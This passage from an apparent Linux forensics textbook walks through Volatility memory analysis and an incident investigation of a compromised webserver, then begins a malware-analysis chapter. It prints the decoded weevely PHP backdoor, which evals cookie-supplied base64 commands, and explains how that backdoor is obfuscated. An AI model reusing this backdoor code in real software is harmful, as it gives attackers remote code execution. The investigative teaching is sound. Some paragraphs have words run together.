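    pattern = re.compile("^" + re.escape(prefix))
    return [line for line in lines if pattern.search(line)]


SAMPLE = [
    "/tmp/xingyi_bindshell_port",
    "/home/john/tmp/notes.txt",   # contains /tmp/ but is not under /tmp
    "/var/tmp/cache",             # same problem
]

if __name__ == "__main__":
    print("anchored:  ", lines_under(SAMPLE, "/tmp"))
    print("unanchored:", [line for line in SAMPLE if "/tmp/" in line])
```

The unanchored search returns every path that merely contains /tmp/ somewhere, which is exactly the noise the anchor removes.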

Once files in the cache have been discovered using linux_enumerate_files, the Volatility linux_find_file command can be used to print out the inode information. This command can also be used to extract the file. To get the inode information the -F <full path to file> option must be used. Unfortunately, the -F option doesn't appear to support wildcards. Once the inode number and address are found, linux_find_file can be rerun with the -i <address of inode> -O <output file> options. The full process of recovering the /tmp/xingyi_bindshell_port file is shown in Figure 8.27. From the figure we can see that this file stores the value 7777, which corresponds to our earlier discovery in the networking section of this chapter.

FIGURE 8.27

Recovering a file with Volatility.

MISCELLANEOUS VOLATILITY COMMANDS

As we said at the beginning of this chapter, we have not covered every one of the Volatility commands for Linux systems. There are a couple of reasons for this. First, the available commands are not equally useful. Some might only be occasionally helpful. Second, I have found that later kernels are not well-supported by Volatility. Some of the commands will fail spectacularly, while others will produce an unsupported error message and exit gracefully. For completeness, I have listed additional Linux commands in Table 8.1.

Table 8.1 Additional Volatility commands not discussed in this chapter.

Command | Description | Notes
linux_banner | Prints Linux banner information | Similar to uname -a command
linux_check_evt_arm | Check Exception Vector Table | ARM architecture only
linux_check_syscall_arm | Check system call table | ARM architecture only
linux_cpuinfo | Print CPU info | Gives CPU model only
linux_dentry_cache | Use dentry cache to make timeline | Likely fails with recent kernels
linux_dmesg | Print dmesg buffer | Same as cat /var/log/dmesg
linux_dump_map | Writes memory maps to disk | Good for malware analysis
linux_elfs | Print ELF binaries from process maps | Lots of output (too much?)
linux_hidden_modules | Carves memory for kernel modules | Found Xing Yi Quan rootkit
linux_info_regs | Print CPU register info | Fails for 64-bit Linux
linux_iomem | Similar to running cat /proc/iomem | Displays input/output memory
linux_kernel_opened_files | Lists files opened by kernel |
linux_ldrmodules | Compare proc maps to libdl | Lots of output
linux_library_list | Lists libraries used by a process | Useful for malware analysis
linux_library_dump | Dumps shared libraries to disk | Use -p to get libs for a process
linux_lsmod | Print loaded modules | Similar to lsmod command
linux_lsof | Lists open files | Similar to lsof command
linux_malfind | Look for suspicious process maps |
linux_memmap | Dump the memory map for a task | Useful for malware analysis
linux_moddump | Dump kernel modules | Useful for malware analysis
linux_mount_cache | Print mounted filesystems from kmem_cache | Likely fails for recent kernels
linux_pidhashtable | Enumerates processes based on the PID hash table |
linux_pkt_queues | Dump per-process packet queues | Likely fails for recent kernels
linux_plthook | Scan ELF Procedure Linkage Table | Useful for malware analysis
linux_process_hollow | Check for process hollowing, which is a technique for hiding malware inside a legitimate process | Can discover malware. Requires base address to be specified.
linux_pslist_cache | Lists processes using kmem_cache | Likely fails for recent kernels
linux_recover_filesystem | Recovers the entire cached filesystem | Likely fails for recent kernels
linux_route_cache | Recovers routing cache from memory (removed in kernel 3.6) | Likely fails for recent kernels
linux_sk_buff_cache | Recovers packets from kmem_cache | Likely fails for recent kernels
linux_slabinfo | Prints info from /proc/slabinfo | Likely fails for recent kernels
linux_strings | Searches for list of strings stored in a file | Takes a long time to run
linux_threads | Prints threads associated with processes | Useful for malware analysis
linux_tmpfs | Recover tmpfs from memory | Likely fails for recent kernels
linux_truecrypt_passphrase | Recover Truecrypt passphrases |
linux_vma_cache | Recover Virtual Memory Areas | Likely fails for recent kernels
linux_volshell | Python shell which allows Volatility scripts to be run interactively | Unless you know a decent amount of Python, you will likely never use this.
linux_yarascan | Use YARA rules to locate malware | Useful for malware identification

As you can see from Table 8.1, many of the Volatility commands for Linux don't work with recent kernels. The remaining commands are predominantly used for malware analysis. You might see some of them in Chapter 10 where we delve a bit deeper into malware.

SUMMARY

In this chapter we have introduced the most commonly used Volatility commands for incident response on a Linux system. We saw that many of these commands returned no additional information about the attack on PFE's computer. In the next chapter we will discuss how this situation changes when the attacker uses some more advanced techniques than those employed in the PFE hack.

CHAPTER 9

Dealing With More Advanced Attackers

INFORMATION IN THIS CHAPTER:

Summary of an unsophisticated attack
Live response
Memory analysis of advanced attacks
Filesystem analysis of advanced attacks
Leveraging MySQL
Reporting to the client

SUMMARY OF THE PFE ATTACK

Up to this point in the book, we have discussed a rather simple attack against a developer workstation at PFE. After finishing your investigation you determined that the breach was caused by the john user having a weak password. It seems that in early March 2015 an attacker realized that the subject system had a john user with administrative access and was connected to the Internet while exposing SSH and FTP servers.

It is difficult to say exactly how the attacker came to have this knowledge. He or she might have done some research on the company and made some reasonable guesses about Mr. Smith's username and likely level of access on his workstation. The attacker doesn't appear to have sniffed John's username directly from the FTP server, as there would have been no need to crack the password if this were the case, since the login information is sent unencrypted.

You can tell that the username was known, but the password was not, because the attacker used Hydra, or a similar online password cracker, to repeatedly attempt to log in as the john user until he or she was successful. The fact that success came quickly for the attacker was primarily the result of Mr. Smith choosing a password in the top 50 worst passwords. The logs reveal that no other usernames were used in the attack.

Once logged in as John, the attacker used his administrative privileges to set up the bogus johnn account, modify a couple of system accounts to permit them to log in, overwrite /bin/false with /bin/bash, and install the Xing Yi Quan rootkit. We have seen the attacker struggle and resort to consulting man pages, and other documentation, along the way. Had Mr. Smith been forced to select a more secure password, this breach may never have occurred, given the attacker's apparently low skill level. What does incident response look like when the attacker has to work a little harder? That is the subject of this chapter.

THE SCENARIO

You received a call from a new client, Phil's Awesome Stuff (PAS). PAS is a small company that sells electronic kits and other fun items to customers that like to play with new technology. Their CEO, Dr. Phil Potslar, has called you because the webmaster has reported that the webserver is acting strangely. As luck would have it, PAS is also running Ubuntu 14.04.

After interviewing Phil and the webmaster, you discover that neither of them knows much about Linux. The webmaster has only recently begun using Linux after dropping Internet Information Services (IIS) as a webserver upon learning how insecure it was at a conference. The current system has been up for two months and is built on Apache 2 and MySQL. The web software is written in PHP. The hardware was purchased from a local computer shop two years ago and originally ran Windows 7 before being wiped and upgraded to Ubuntu.

The webmaster reports that the system seems sluggish. A "System Problem Detected" warning message also seems to be popping up frequently. Having completed your interviews, you are now ready to begin a limited live response in order to determine if there has been a breach. Before traveling to PAS, you walked the webmaster through the process of installing snort and doing a basic packet capture for a little while in order to have some additional data to analyze upon your arrival.

INITIAL LIVE RESPONSE

Upon arriving at PAS, you plug your forensics workstation into the network and start your netcat listeners as shown in Figure 9.1. Then you plug your response flash drive into the subject machine, load known-good binaries, and execute the initial-scan.sh script as shown in Figure 9.2.

FIGURE 9.1

Starting a case on forensics workstation.

FIGURE 9.2

Loading known-good binaries and performing the initial scan on the subject.

Upon examining the log file generated by initial-scan.sh, it quickly becomes apparent that something is amiss. One of the first things you notice is that a shell is listening on port 44965, as shown in Figure 9.3. Using netcat, you perform a quick banner grab on this port and find that it reports itself as SSH-2.0-WinSSHD, as shown in Figure 9.4. After doing some research, you discover that this is a dropbear SSH backdoor. You attempt to SSH to this machine, which confirms your suspicions (this is also shown in Figure 9.4).

FIGURE 9.3

Part of the initial-scan log file. Highlighted portion shows a shell that is listening on port 44965.

FIGURE 9.4

Banner grab and SSH login attempt that confirm the existence of a dropbear SSH backdoor on port 44965.

So far we know that something has happened, because a backdoor has been installed. Examination of failed login attempts reveals a long list of failed attempts for the john user via SSH on May 3 at 23:07. This is shown in Figure 9.5. It is not yet clear if these attempts occurred before or after the backdoor was installed.

FIGURE 9.5

A large number of failed login attempts within the same minute.

Further analysis of the initial-scan.sh log reveals that a new user, mysqll, with a home directory of /usr/local/mysql has been created. Furthermore, the user ID has been set to zero, which gives this new user root access. The relevant part of the log is shown in Figure 9.6.

FIGURE 9.6

Evidence of a bogus user with root access.

You give Dr. Potslar the bad news, that his webserver has in fact been compromised. When he hears of the backdoor, he makes the decision to replace the webserver with a new machine (it was time for an upgrade anyway). A new machine is purchased from a local store, and a friend of yours helps PAS install a fresh version of Ubuntu on the machine, install and configure Snort, set up a webserver with fresh code from the webmaster's code repository, replicate the MySQL database from the webserver, and switch it out for the existing server. Your friend works closely with the webmaster so that he can perform this process unassisted should the new server become re-infected.

Your work is far from over. At this point you know that the machine was compromised but not how and why. Once the new server is in place and verified to be working properly, you use LiME to extract a memory image and then shut down the subject machine by pulling the plug. According to your initial-scan.sh log, the machine is running Ubuntu 14.04 with a 3.16.0-30 kernel. As you already have a LiME module for this exact configuration, dumping the RAM was as simple as running sudo insmod lime-3.16.0-30-generic.ko "path=tcp:8888 format=lime" on the subject system, and then running nc 192.168.56.101 8888 > ram.lime on the forensics workstation.

You pull the hard drive from the subject computer and place it into your USB 3.0 drive dock. Using the udev rules-based write blocking, as described in Chapter 4, and dcfldd, you create a forensic image of the hard drive which you store on a portable 6 TB USB 3.0 drive with all of the other data related to this case. Even though the chances of finding a remote attacker are slight, you still need to figure out what happened to prevent a recurrence. Also, we have not yet performed enough analysis to rule out an insider who could be prosecuted or subject to a civil lawsuit. It never hurts to be able to prove the integrity of your evidence.

MEMORY ANALYSIS

You decide to start with memory analysis in hopes that it will guide you to the correct places during your filesystem analysis. As always, there is nothing that stops you from switching back and forth between memory analysis and filesystem analysis. As before, we define an alias for Volatility in the .bashrc file as shown in Figure 9.7.

FIGURE 9.7

Adding an alias to .bashrc to more easily run Volatility.

Partial results from the Volatility linux_pslist command are shown in Figure 9.8. From these results we see that this system also has the Xing Yi Quan rootkit. The in.ftpd process being run with an invalid user ID of 4294936576 in the last line of Figure 9.8 also looks a bit suspicious.

FIGURE 9.8

Partial results from running the Volatility linux_pslist command against the PAS subject system. The highlighted portion shows a rootkit process. The last process listed also has a suspicious user ID.

Running the Volatility linux_psaux command provides some more detail on what is happening. As can be seen in Figure 9.9, in process 8019 the user with ID 1001 changed to the bogus mysqll user with the command su mysqll. This generated a bash shell with root privileges because mysqll has a user ID of zero (process 8021). The xingyi_bindshell is running with root privileges in process 8540. The rootkit was likely started from the shell in process 8021. This can be verified by running linux_pstree.

FIGURE 9.9

Partial results from running the Volatility linux_psaux command against the PAS subject system. The highlighted portion shows malicious activity.

We noticed a dropbear SSH backdoor listening on port 44965. We can use the Volatility linux_netstat command and pipe the results to grep TCP to discover the process ID for this process. Partial results from this command are shown in Figure 9.10. From the results we see that the dropbear process ID is 1284. This low process number suggests that dropbear has been set to automatically start. The linux_pstree results support this inference. Furthermore, the linux_pstree results reveal that the root shell in process 9210 was launched by xingyi_bindshell running in process 8540.

FIGURE 9.10

Partial results from running the Volatility linux_netstat command against the PAS subject system and piping the output to "grep TCP".

The process maps for the two suspicious processes are captured with the linux_proc_maps command as shown in Figure 9.11. The process spaces for both programs are also dumped to disk for later analysis as shown in Figure 9.12.

FIGURE 9.11

Saving process maps for suspicious processes.

FIGURE 9.12

Saving process memory for suspicious processes.

The linux_bash command produces some very enlightening results. As shown in Figure 9.13 and Figure 9.14, the attacker is actively trying to become more deeply embedded in the system. A lot of malicious activity was recorded in the bash history for process 9210. The results from linux_pslist confirm that this is a root shell. Figure 9.13 shows the attacker downloading and installing the Weevely PHP backdoor. Later, in Figure 9.14, the attacker can be seen downloading the rockyou.txt password list and then performing an online password attack against the sue user account with Hydra.

FIGURE 9.13

Downloading and installing a rootkit.

FIGURE 9.14

Online password cracking with Hydra.

Hydra was used against the local FTP server. Before launching Hydra, the attacker copied both the /etc/passwd and /etc/shadow files. It isn't clear why Hydra was used, instead of an offline password cracker like John the Ripper. Perhaps the attacker didn't want to copy off the passwd and shadow files. Using the local FTP server for password cracking is somewhat fast and may not generate alerts if an installed Intrusion Detection System (IDS) isn't configured to monitor this traffic.

The linux_psenv command run against processes 8540, 1284, and 9210 produces interesting results. Some of the results are shown in Figure 9.15. The highlighted portion shows that a hidden directory /usr/local/mysql/.hacked has been created. The process environment for the dropbear backdoor confirms that this program is automatically started when the system boots to runlevel 2 or higher.

FIGURE 9.15

Partial results from running the Volatility linux_psenv command against suspicious processes on the PAS subject system.

The entire suite of Volatility linux_check_xxxx commands was run against the PAS subject system. Only the linux_check_syscall command returned any results. Some of these results are displayed in Figure 9.16. From the results we can see that Xing Yi Quan has hooked the 64-bit system calls for open, lstat, dup, kill, getdents, chdir, rename, rmdir, and unlinkat. When viewed with the complete output for this command, the addresses for hooked system calls are noticeably different from the unaltered call handlers.

FIGURE 9.16

Partial results from the Volatility linux_check_syscall command run against the PAS subject system.

The Volatility linux_enumerate_files command was run against the PAS subject system and the results were saved to a file. Egrep was then used on the file to locate certain files in the filesystem cache. The partial results shown in Figure 9.17 reveal that the rockyou.txt password list and the Xing Yi Quan rootkit are both stored in the hidden directory /usr/local/mysql/.hacked.

FIGURE 9.17

Malicious files stored in a hidden directory.

While Volatility could be used to retrieve some files from the file cache, it is likely easier to just use the filesystem image for this purpose. If there is a need to retrieve more information from the memory image, the memory image is not going anywhere. We might return to using Volatility when performing malware analysis.

FILESYSTEM ANALYSIS

At this point, we know there are at least two pieces of malware that were likely installed around May 4, based on the bash histories. We also know that a new user with administrative privileges was created and that the attacker has attempted to crack additional passwords on the system. What we do not know yet is when the initial breach occurred and how.

Using our Python scripts from Chapter 5, the disk image is easily mounted on the forensics workstation. Once this is accomplished, running grep 1001 on the passwd file reveals that user ID 1001, which was used to launch one of the root shells, belongs to the michael user, whose real name is Michael Keaton.

Because the system was running a webserver, and the Weevely PHP backdoor was installed, it makes sense to have a look at the webserver logs for some possible insight into how the breach occurred. We do not know at this point if the breach was caused by a problem with the website, but it is certainly worth checking out.

The Apache webserver logs can be found in /var/log/apache2. The two primary log files are access.log and error.log, which store requests and errors, respectively. Both of these logs have the standard numbered archives. After examining the access logs, it is discovered that a rarely used, obscure page, called dns-lookup.php, is called 51 times late on May 3. A look at the error logs reveals 19 errors logged about the same time. Some of these results are shown in Figure 9.18.

FIGURE 9.18

Evidence of an attack on the webserver.

Examination of the MySQL logs found in /var/log/mysql covering the same period of time reveals that they contain multiple errors. The zcat command was used to cat the compressed log files, which were then piped to egrep. The complete command used was zcat error.log.2.gz | egrep '(^150503)|(ERROR)'. The regular expression in the egrep command displays only lines that begin with the date code for May 3 or that contain an error. Partial results from this command are shown in Figure 9.19.

FIGURE 9.19

MySQL errors indicating a possible website attack.
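If you prefer to do this filtering from a script, for instance to feed the matches into other tooling, the same selection can be expressed in Python. This is a rough equivalent of the zcat and egrep pipeline rather than a replacement for it; the function names are hypothetical and the log file name is simply the one used in the command above.

```python
import gzip
import re

# Same alternation as the egrep pattern: the line starts with the
# date code 150503, or the line contains the word ERROR anywhere.
PATTERN = re.compile(r"(^150503)|(ERROR)")


def matching_lines(lines, pattern=PATTERN):
    """Return the lines that match the pattern, in their original order."""
    return [line for line in lines if pattern.search(line)]


def filter_gzip_log(path, pattern=PATTERN):
    """Decompress a .gz log on the fly and filter it line by line."""
    with gzip.open(path, "rt", errors="replace") as handle:
        return matching_lines((line.rstrip("\n") for line in handle), pattern)


if __name__ == "__main__":
    for line in filter_gzip_log("error.log.2.gz"):
        print(line)
```

Because each line is tested on its own, the "^" in the pattern behaves the same way it does in egrep and only matches at the beginning of a log line.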

Memory analysis revealed the existence of a hidden directory /usr/local/mysql/.hacked. Issuing the command ls -al from the /usr/local/mysql directory reveals several interesting things. There is another hidden directory, /usr/local/mysql/.weevely, that was created shortly after the suspicious web activity occurred on May 3. Immediately after the webserver attack, .bashrc and .bash_logout files were created in the /usr/local/mysql directory. A .bash_history file in the same directory reveals the installation of the weevely backdoor with a password of "hacked". These results are displayed in Figure 9.20.

FIGURE 9.20

Evidence of the installation of the weevely PHP SSH backdoor.

LEVERAGING MYSQL

The picture of what happened to the PAS webserver is starting to become pretty clear. Because it literally only takes a couple of minutes, the metadata is imported into MySQL using the techniques discussed in Chapter 6. Once everything is loaded in the database, a timeline from May 3 onward is easily created. The timeline shows intense webserver activity at approximately 22:50 on the 3rd of May. Further analysis reveals changes in the /usr/local/mysql/.weevely directory at 23:53 and the creation of a new file, /var/www/html/index3.php. A portion of the timeline is shown in Figure 9.21.

FIGURE 9.21

Portion of the PAS subject system timeline. The highlighted portion shows new files associated with backdoors.

The index3.php file is shown in Figure 9.22. This is some obfuscated code created by the weevely backdoor. This code both inserts extra characters and uses base64 encoding to hide what it does. $kh becomes "str_replace", $hbh equals "base64_decode", and $km is set to "create_function". This makes the last line $go = create_function('', base64_decode(str_replace("q", "", $iy.$gn.$mom.$scv))); $go();. Parsing all of this through an online base64 decoder produces the following:

$c='count';$a=$_COOKIE;if(reset($a)=='ha' && $c($a)>3){ini_set('error_log','/dev/null');$k='cked';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'),join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}

FIGURE 9.22

Obfuscated PHP code from the weevely PHP SSH backdoor.

If you look closely enough, you will see that the weevely password "hacked" is embedded in this code in obfuscated form, split into the strings 'ha' and 'cked'.
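The two-layer trick used here (filler characters sprinkled through a base64 string that is itself split across several variables) can be undone offline without an online decoder. The sketch below demonstrates the technique on a harmless payload built inside the script; it does not contain the actual strings from index3.php, and the function names are hypothetical. Only the filler character "q" is taken from the str_replace call discussed above.

```python
import base64


def obfuscate(payload: bytes, filler: str = "q", pieces: int = 4) -> list:
    """Build a demo sample: base64, filler every 3 chars, split into fragments."""
    encoded = base64.b64encode(payload).decode("ascii")
    if filler in encoded:
        raise ValueError("filler character collides with the encoded payload")
    noisy = filler.join(encoded[i:i + 3] for i in range(0, len(encoded), 3))
    size = max(1, -(-len(noisy) // pieces))  # ceiling division
    return [noisy[i:i + size] for i in range(0, len(noisy), size)]


def deobfuscate(fragments, filler: str = "q") -> bytes:
    """Reverse the process: concatenate, strip the filler, base64 decode."""
    joined = "".join(fragments)
    return base64.b64decode(joined.replace(filler, ""))


if __name__ == "__main__":
    demo = obfuscate(b"echo 'hello';")
    print(demo)               # fragments, as they would sit in separate variables
    print(deobfuscate(demo))  # the recovered payload
```

When working with a real sample, copy the fragment strings out of the PHP file as data and decode them; never execute the PHP itself on your forensics workstation.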

FurtheranalysisofthetimerevealsthatHydrawasrunafewtimesonthe4thofMay.Some of the packet captures created by thewebmaster, after a problemwas suspected,were also analyzed. There seems to have been a test of the dropbear backdoor on port44965 in thiscapture,butmost trafficseems tobecomingdirectlyonport22.SomeofthistrafficisshowninFigure9.23.

FIGURE9.23

SomeofthetrafficcapturedfromthePASsubjectsystem.Thebottomfourpacketsappeartobeatestofthedropbearbackdoor.TheremainingpacketsinthiscaptureareonthenormalSSHport22.

Partial results from running the query select * from logins order bystart; are shown in Figure 9.24. The highlighted entries are around the time of thebreach.AcompleteanalysisofthisinformationrevealsthatonlyJohnandMichaelhavebeen logging on to the system. This indicates that either John’s password has beencompromisedorthattheattackerisnotloggingindirectly.Theotherevidencegatheredsofarpointstothelatter.

FIGURE 9.24

Login information from the PAS subject system.

Running a query of failed logins, select * from login_fails order by start;, paints a different picture. There is a long string of failed login attempts for John up until 23:07:54 on the 3rd of May. When combined with a successful remote login by John at 23:10:11 that day, it would appear that John's account has been compromised. The failed logins are shown in Figure 9.25. At this stage it would appear that the initial compromise was the result of a webserver vulnerability. Once the attacker had his or her foot in the door, additional attacks were performed resulting in at least one compromised password.

FIGURE 9.25

Failed login attempts. The failed attempts happen repeatedly until 23:07:54. Consultation with the information from Figure 9.24 indicates that the password was compromised.
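The reasoning used here, a run of failed logins followed shortly by a success for the same account, can also be expressed as a query. The sketch below uses Python's built-in sqlite3 module as a stand-in for MySQL. The column names, the year, and all rows other than the two times quoted in the text (23:07:54 and 23:10:11) are assumptions made purely for illustration; only the table names logins and login_fails come from the case.

```python
import sqlite3


def success_after_failures(conn, min_failures=3):
    """List accounts whose run of failed logins is followed by a success.

    Returns (username, failure count, last failure, first later success).
    Timestamps are ISO-style strings, so string comparison orders them.
    """
    results = []
    failed = conn.execute(
        "select username, count(*), max(start) from login_fails "
        "group by username having count(*) >= ? order by username",
        (min_failures,),
    ).fetchall()
    for username, fail_count, last_fail in failed:
        first_success = conn.execute(
            "select min(start) from logins where username = ? and start > ?",
            (username, last_fail),
        ).fetchone()[0]
        if first_success is not None:
            results.append((username, fail_count, last_fail, first_success))
    return results


def build_sample_database():
    """Create an in-memory database with a hypothetical, simplified schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table logins (username text, start text)")
    conn.execute("create table login_fails (username text, start text)")
    # Illustrative rows; the year and the earlier failure times are placeholders.
    conn.executemany(
        "insert into login_fails values (?, ?)",
        [
            ("john", "2015-05-03 23:07:50"),
            ("john", "2015-05-03 23:07:52"),
            ("john", "2015-05-03 23:07:54"),
        ],
    )
    conn.executemany(
        "insert into logins values (?, ?)",
        [
            ("michael", "2015-05-03 09:15:00"),
            ("john", "2015-05-03 23:10:11"),
        ],
    )
    return conn


for row in success_after_failures(build_sample_database()):
    print(row)
```

A hit from a query like this is a lead rather than proof; a legitimate user who mistypes a password several times would produce the same pattern.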

Unlike the history recovered with Volatility, the bash history from .bash_history files doesn't have timestamps, but it can still provide useful information. As shown in Figure 9.26, John's account was used to download and install two additional rootkits that we have not yet discovered. The first one is a web shell called Poison that was installed on the webserver as index2.php. The second one is called RK.

FIGURE 9.26

Evidence of the installation of two additional rootkits.

A listing of PHP files in the document root and the start of the index2.php file are shown in Figure 9.27. The index2.php file claims to be the Poison Shell 1.0 by Doddy Hackman. Notice that the timestamp on index2.php is from 2013, unlike some of the other pieces of malware discovered so far that didn't alter the timestamps.

FIGURE 9.27

Evidence that the Poison Shell 1.0 has been installed on the subject system.

We see a hidden directory called ".rk" that is used to store the RK rootkit. Because we have the subject's filesystem mounted, we can use the command find <mount point> -type d -name '.*' to locate all hidden directories. The results of running this command against the PAS subject system are shown in Figure 9.28. Note that the ".rk" directory is not listed. This directory must have been deleted later. Furthermore, no new suspicious directories are found.

FIGURE 9.28

Hidden directories on the PAS subject system.
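For readers who would rather collect these results in a script, the same search can be approximated in Python. This is a sketch under the assumption that the subject filesystem is already mounted (read-only) at some mount point; the function name hidden_directories is hypothetical.

```python
import os
import sys


def hidden_directories(mount_point):
    """Return every directory below mount_point whose name starts with a dot.

    Roughly equivalent to: find <mount point> -type d -name '.*'
    Symbolic links are skipped because find's -type d does not match them.
    """
    found = []
    for root, dirs, _files in os.walk(mount_point):
        for name in dirs:
            path = os.path.join(root, name)
            if name.startswith(".") and not os.path.islink(path):
                found.append(path)
    return sorted(found)


if __name__ == "__main__" and len(sys.argv) == 2:
    # Usage: python3 hidden_dirs.py <mount point>
    for directory in hidden_directories(sys.argv[1]):
        print(directory)
```

Returning a sorted list makes it easy to compare runs against different images or to load the results into a database table.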

MISCELLANEOUS FINDINGS

Running the out-of-sequence-inodes.sh script from Chapter 7 on the /sbin directory revealed nothing interesting. As with our first case, running this script on the /bin directory allows the Xing Yi Quan rootkit to be easily seen. Partial output from this command is shown in Figure 9.29.

FIGURE 9.29

Out of sequence inodes for a recently added rootkit.

After you inform Dr. Potslar of the excessive requests for dns-lookup.php on May 3, he passes this information along to the webmaster. The webmaster then has a look at this code with the help of a friend from the local Open Web Application Security Project (OWASP) chapter which he has recently joined. They discover a code execution vulnerability on this page.

SUMMARY OF FINDINGS AND NEXT STEPS

You are now ready to write up your report for PAS. Your report should normally include an executive summary of less than a page, narrative that is free of unexplained technical jargon, and concrete recommendations and next steps (possibly with priority levels if it makes sense). Any raw tool outputs should be included in an appendix or appendices at the end of the report, if at all. It might make sense to burn all of this to a DVD, which includes tool outputs and your database files.

What should you do with the subject hard drive and your image? That depends on the situation. In this case there is very little chance of ever finding the attacker. Even if the attacker were found, he or she would quite possibly be in a jurisdiction that would make prosecution difficult or impossible. Even if this is not the case, a lawsuit might be a bad business decision given the costs involved (both money and time). No customer information is stored on the PAS subject machine. The vast majority of the company's sales occur at various conferences and trade shows. Customers wanting to buy products from the website are directed to call or e-mail the company. Given all of this, you might as well return the hard drive to the company. The image can be retained for a reasonable time, with the cost of the backup drive containing the image and all other case-related files included on your bill to PAS.

Summary of findings:

On the evening of May 3, an attacker exploited a vulnerability in the dns-lookup.php file on the webserver.
The attacker likely used the access gained to gather information about the system. The details of what he or she did are not available because parameters sent to web pages are not recorded in the logs.
After repeated failed SSH login attempts using John's account shortly after the breach (many of which occurred in the same minute), the attacker successfully logged in using John's account. An online password cracker, such as Hydra, was likely used. The fact that the attacker was successful so quickly suggests that John has a weak password.
The attacker installed at least three rootkits or backdoors on the system.
There is evidence to suggest that the attacker attempted to crack other passwords. Michael's account was used on one occasion, which suggests his password may have been cracked. A command to crack Sue's password was found in history files. It is unknown if the attack against her password was successful, as her account has never been used to log in to this machine.
The attacker seems to have primarily worked by using SSH to remotely log in with John's account, which has administrative privileges.
The attacker created a bogus account with a username of mysqll. This account had administrative privileges. On one occasion the attacker logged in remotely as Michael and then switched to the mysqll account.

Recommendations:

Urgent: Fix the vulnerability in dns-lookup.php.
Urgent: All users must change passwords to something secure. It is recommended that new passwords are verified to not be in the rockyou.txt password list.
Important: Examine the entire website for other vulnerabilities. It is recommended that all items on the OWASP Top 10 list (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) be checked at a minimum.
Recommended: Install Snort or other Intrusion Detection System on the new webserver.
Recommended: Support the webmaster in his efforts to learn more about website security.
Recommended: Limit accounts on the webserver to the bare minimum. Several accounts on this server appear to be unused (e.g. Sue's account, which was targeted by the attacker).
Recommended: Periodic review of logs with emphasis on the Apache and MySQL logs. The initial breach might have been detected by such a review.
Recommended: Periodic penetration tests should be performed. If hiring a penetration tester is not economically feasible, at a minimum, the webmaster or other PAS employee should become familiar with and use several web vulnerability scanners.

SUMMARY

In this chapter we walked through an attack that was slightly more sophisticated than the PFE attack discussed earlier in this book. We found that the same techniques could be employed, regardless of the sophistication level of the attacker. Getting the full picture of the attacker's actions required the use of live analysis, memory analysis, and filesystem analysis. We were able to research the malware installed to discover its functionality. In the next chapter, we will discuss how to analyze unknown executables. Our conversation will include determining if unknown files are actually malware.

CHAPTER 10

Malware

INFORMATION IN THIS CHAPTER:

The file command
Using hash databases to identify malware
Using strings to gather clues
The nm command
The ldd command
Using readelf to get the big picture
Using objdump for disassembly
Using strace to track system calls
Using ltrace to track library calls
Using the GNU Debugger
Obfuscation techniques

IS IT MALWARE?

You've discovered a file left by an attacker on the subject system. Naturally, you want to know if it is some sort of malware. The first thing you want to do is classify the file. Is it an executable or some sort of data file? If it is executable, what does it do? What libraries does it use? Does it connect to the attacker across the network?

While this is not a book on reverse engineering Linux malware, the information from this chapter should be sufficient for you to distinguish malware from benign files and glean a high-level understanding of what types of functions malware performs. From your client's perspective, they do not care what the malware does or how many clever techniques were used by the programmer. Their biggest concern is what information may have been compromised as the result of the malware. This should be your biggest concern as well. In some cases, you may need to do some investigation of the malware to help you determine the extent of the damage.

The file command

Unlike Windows, which stupidly uses file extensions to determine file type, Linux is smart enough to determine what a file is by looking at its file signature. The Linux file command is used to display the file type to the user. The file command goes way beyond providing information on a file's extension.

The results of running file on some of the files associated with the Xing Yi Quan rootkit from the PAS subject system are shown in Figure 10.1. Notice that file is able to distinguish between the install, README, and xingyi_addr.c files, which are an executable Perl script in ASCII text, a plain ASCII text file, and a C source file in ASCII text, respectively. Compare this to Windows, which cannot distinguish install from README, because there is no file extension (which normally indicates a directory for Windows).

FIGURE 10.1

Results of running the file command on rootkit files saved from the PAS subject system.

The information provided for binary files is much more specific. Here we see that the binaries are 64-bit Executable and Linkable Format (ELF) files for little endian (LSB) systems based on the System V branch of UNIX (Linux is such a system). They are also dynamically linked, meaning they use shared libraries, as opposed to statically linking all the code they need in the executable (which would make it huge). The files are compatible with kernel versions 2.6.24 and higher. The files have not been stripped of the debugging symbol information. A Secure Hash Algorithm (SHA) hash for each binary build identifier is also given.

As you can see, this one command provides quite a bit of information. If file doesn't identify the suspicious file as an executable binary or a script, it is probably some sort of data file, or a component that was used to build some malware. For files that are not executable, there are ways of telling if executables use a file. These methods will be discussed later in this chapter (although there are also ways of obscuring this from would-be reverse engineers).

Is it a known-bad file?

A number of organizations maintain databases of known malware MD5 and SHA hashes. Naturally, most of these hashes pertain to Windows, the king of malware, but many databases list Linux malware as well. Some of these databases must be downloaded and others must be accessed online. One of the online databases that is accessible via multiple services is the Malware Hash Registry (MHR) maintained by Team Cymru (http://team-cymru.org/MHR.html).

One of the nice things about MHR is that it uses both MD5 and SHA hashes. The SHA hash is easily calculated using sha1sum <filename>. Perhaps the easiest way to use the MHR is via the whois command. The whois service is normally used to look up information on a web domain. The syntax for using this service to check a binary is whois -h hash.cymru.com <MD5 or SHA hash>. If the file is known, the UNIX timestamp for the last seen time, along with the anti-virus detection percentage, is returned. The results of running this command against one of the Xing Yi Quan files are shown in Figure 10.2.

FIGURE 10.2

Checking a binary hash against the Malware Hash Registry.

Why didn't this return a hit? Recall that hash functions are designed such that changing a single bit radically changes the hash value. Many pieces of Linux malware are built on the victim machine, which makes it easy to hard code values such as passwords and addresses, while simultaneously changing any hash values.
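The effect of a one-bit change can be seen directly with Python's hashlib module. The sketch below computes the same MD5 and SHA-1 values that md5sum and sha1sum would report, then flips a single bit in a made-up stand-in for a source line with a hard-coded password. The sample bytes and the helper names are assumptions for illustration only.

```python
import hashlib


def hashes_of_bytes(data):
    """Return (MD5, SHA-1) hex digests for a bytes object."""
    return hashlib.md5(data).hexdigest(), hashlib.sha1(data).hexdigest()


def hashes_of_file(path, chunk_size=65536):
    """Return (MD5, SHA-1) hex digests for a file, read in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def flip_bit(data, bit_index):
    """Return a copy of data with exactly one bit inverted."""
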